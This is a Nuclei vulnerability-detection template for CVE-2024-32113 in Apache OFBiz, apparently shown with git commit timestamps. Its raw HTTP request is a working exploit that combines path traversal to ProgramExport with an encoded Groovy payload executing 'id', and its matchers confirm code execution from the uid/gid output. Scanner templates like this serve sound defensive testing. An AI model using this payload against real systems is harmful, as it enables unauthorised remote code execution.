nuclei-templates/http/cves/2024/CVE-2024-32113.yaml

49 lines
1.6 KiB
YAML
Raw Normal View History

2024-06-14 16:26:31 +00:00
id: CVE-2024-32113
info:
name: Apache OFBiz Directory Traversal - Remote Code Execution
author: DhiyaneshDK
severity: high
description: |
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13
2024-06-14 17:55:40 +00:00
remediation: |
Users are recommended to upgrade to version 18.12.13, which fixes the issue.
2024-06-14 16:26:31 +00:00
reference:
- https://issues.apache.org/jira/browse/OFBIZ-13006
- https://lists.apache.org/thread/w6s60okgkxp2th1sr8vx0ndmgk68fqrd
- https://ofbiz.apache.org/download.html
- https://ofbiz.apache.org/security.html
- https://github.com/absholi7ly/Apache-OFBiz-Directory-Traversal-exploit
2024-06-14 17:55:40 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2024-32113
2024-06-14 16:26:31 +00:00
classification:
2024-06-14 17:55:40 +00:00
cve-id: CVE-2024-32113
2024-06-14 16:26:31 +00:00
epss-score: 0.00115
epss-percentile: 0.45112
metadata:
verified: true
max-request: 1
fofa-query: app="Apache_OFBiz"
tags: cve,cve2024,apache,obiz,rce
http:
- raw:
- |
POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
groovyProgram=%74%68%72%6f%77%20%6e%65%77%20%45%78%63%65%70%74%69%6f%6e(%27%69%64%27.%65%78%65%63%75%74%65().%74%65%78%74);
matchers-condition: and
matchers:
- type: regex
part: body
regex:
2024-06-14 16:28:12 +00:00
- "java.lang.Exception:"
2024-06-14 16:26:31 +00:00
- "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
condition: and
- type: status
status:
- 200